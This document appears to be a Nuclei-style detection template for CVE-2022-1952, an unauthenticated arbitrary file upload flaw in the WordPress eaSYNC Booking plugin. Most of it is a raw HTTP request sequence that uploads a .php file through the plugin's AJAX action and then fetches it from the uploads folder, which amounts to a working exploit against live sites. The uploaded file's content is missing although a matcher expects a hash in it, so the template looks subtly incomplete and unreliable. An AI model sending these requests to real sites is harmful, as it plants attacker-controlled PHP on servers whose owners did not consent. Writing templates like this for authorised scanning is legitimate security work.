id: CVE-2022-1952

info:
  name: WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    WordPress eaSync Booking plugin bundle for hotel, restaurant and car rental before 1.1.16 is susceptible to arbitrary file upload. The plugin contains insufficient input validation of an AJAX action. An allowlist of valid file extensions is defined but is not used during the validation steps. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://wpscan.com/vulnerability/ecf61d17-8b07-4cb6-93a8-64c2c4fbbe04
    - https://wordpress.org/plugins/easync-booking/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1952
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1952
    cwe-id: CWE-434
    epss-score: 0.95933
    epss-percentile: 0.99225
    cpe: cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 3
    verified: true
    framework: wordpress
    vendor: syntactics
    product: free_booking_plugin_for_hotels\,_restaurant_and_car_rental
  tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
        Content-Type: multipart/form-data; boundary=------------------------98efee55508c5059

        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="action"

        easync_session_store
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="type"

        car
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="with_driver"

        self-driven
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php"
        Content-Type: application/octet-stream

        --------------------------98efee55508c5059--

      - |
        GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37

      - |
        GET /wp-content/uploads/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - contains(header_3, "text/html")
          - status_code_3 == 200
          - contains(body_1, 'success\":true')
          - contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')
        condition: and

    extractors:
      - type: regex
        name: filename
        group: 1
        regex:
          - 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php'
        internal: true